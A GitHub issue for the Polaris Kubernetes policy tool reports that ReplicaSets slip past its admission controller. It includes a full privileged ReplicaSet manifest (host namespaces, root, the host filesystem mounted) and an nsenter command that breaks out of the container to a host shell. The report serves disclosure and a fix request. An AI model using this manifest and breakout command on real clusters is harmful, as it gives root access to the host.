### ISSUE TITLE
Admission Controller - Block ReplicaSet

### ISSUE THREAD

**Issue by dbones** [FairwindsOps/polaris#732]
### What happened?

We are able to use the ReplicaSet to circumvent our Polaris Policy. This allowed us to deploy with access to break out of the container.

Main area's of the deployement, along with hostPath mapping.

```
hostIPC: true
hostPID: true
hostNetwork: true
allowPrivilegeEscalation: true
privileged: true
```
deploy yaml below.

### What did you expect to happen?

To apply the configuration on the ReplicaSet, and stop it from deploying

### How can we reproduce this?

If you have an image with nsenter, then you can do the second part,

here is the ReplicaSet Yaml, the image name needs to be replaced.

```
apiVersion: apps/v1
kind: ReplicaSet
metadata:
  name: privesc-replicaset
  labels:
    app: privesc-replicaset
spec:
  replicas: 1
  selector:
    matchLabels:
      tier: privesc-replicaset
  template:
    metadata:
      labels:
        tier: privesc-replicaset
    spec:
      hostIPC: true
      hostPID: true
      hostNetwork: true
      containers:
      - name: privesc-replicaset-pod
        image: image-with-nsenter-on-it
        resources:
          limits:
            memory: 512Mi
            cpu: 1
          requests:
            memory: 512Mi
            cpu: 1
        securityContext:
          allowPrivilegeEscalation: true
          capabilities:
            drop:
            - ALL
          privileged: true
          readOnlyRootFilesystem: false
          runAsNonRoot: false
          runAsUser: 0
          runAsGroup: 0
        volumeMounts:
        - mountPath: /host
          name: host-os
      volumes:
      - name: host-os
        hostPath:
          path: /
```

Container breakout via nsenter:
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

### Version

4.2 (we think 5.x is not in a helm chart yet)

### Search

- [X] I did search for other open and closed issues before opening this.

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

### Additional context

our config for Polaris has the following around security

```
    # security
    hostIPCSet: danger
    hostPIDSet: danger
    notReadOnlyRootFilesystem: ignore #Check has been replaced by the readOnlyRootFilesystem custom check
    privilegeEscalationAllowed: danger
    runAsRootAllowed: danger
    runAsPrivileged: danger
    dangerousCapabilities: danger
    insecureCapabilities: danger
    hostNetworkSet: danger
    hostPortSet: danger
 ```
 
 in addition we have some custom checks which use the following controllers
 
 ```
       controllers:
        include:
        - Deployment
        - Pod
        - Job
        - DaemonSet
        - StatefulSet  # currently testing this one
```

Can we add support for the ReplicaSet in the Controllers list?
